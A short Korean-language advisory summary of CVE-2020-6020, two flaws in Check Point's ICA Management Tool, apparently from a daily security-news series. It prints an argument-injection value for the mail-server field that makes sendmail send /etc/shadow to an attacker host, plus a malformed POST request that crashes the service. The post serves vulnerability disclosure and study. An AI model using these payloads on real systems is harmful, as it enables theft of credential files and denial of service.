[하루한줄] CVE-2020-6020: Checkpoint ICA Management Tool에서 발견된 취약점 2가지

URL

Vulnerabilities in Checkpoint ICA Management Tool

Target

  • Checkpoint Security Manager - ICA Management Tool

Explain

Checkpoint Security Management의 ICA(Internal Certificate Authority) Management Tool에서 Argument Injection과 Denial of Service 취약점이 발견되었습니다. ICA Management Tool은 기본적으로 비활성화되어있으며 cpca_client set_mgmt_tool on <your certification>로 활성화할 수 있으며 설정이 활성화되면 http://:18265/를 통해 접근할 수 있습니다. cpca_client set_mgmt_tool on -no_ssl을 통해 활성화할 시 인증 없이 해당 서비스에 접근이 가능하며 Manage Certificates에 접속했을 때 관리자인지 별도의 확인을 진행하지 않습니다.

ICA Management Tool에서 메일을 보내는 프로세스인 cpca는 sendmail 바이너리를 통하여 메일을 전송합니다. sendmail은 파일 전송 기능을 지원하지만 메일을 보낼 때 누가 보내는지 확인을 하지 않으며 최고 권한으로 실행되므로 모든 파일에 접근이 가능합니다. 따라서 인자로 파일 이름을 넘겨주면 해커의 메일 서버로 파일을 전송할 수 있습니다.

해커가 netcat 등을 통해 서버를 연 후 Configure the CA의 “Management Tool mail server”에 <hacker_ip> -m /etc/shadow %0a%0a를 입력하면 해커의 메일 서버에 /etc/shadow 파일 내용이 메일 형식으로 날아오게 됩니다.

Denial of Service의 경우 입력 값에 대한 유효성 검사 실패로 인해 발생합니다. 원격 클라이언트가 다음과 같은 형식으로 POST request를 보낼 경우 프로그램이 종료됩니다.

POST /file_init?_ HTTP/1.1
Host: checkpoint.host:18265
Cookie: _
Content-Length: 1

q